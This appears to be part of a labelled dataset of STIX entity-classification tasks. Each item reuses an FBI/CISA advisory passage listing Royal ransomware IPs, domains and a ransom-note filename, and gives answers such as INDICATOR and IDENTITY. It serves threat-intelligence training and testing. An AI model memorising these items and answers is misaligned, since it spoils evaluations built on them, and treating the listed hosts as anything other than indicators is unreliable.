"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n94.232.41.105\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n102.157.44.105\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n41.107.77.67\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n82.12.196.197\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFBI\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nCISA\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n181.141.3.126\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 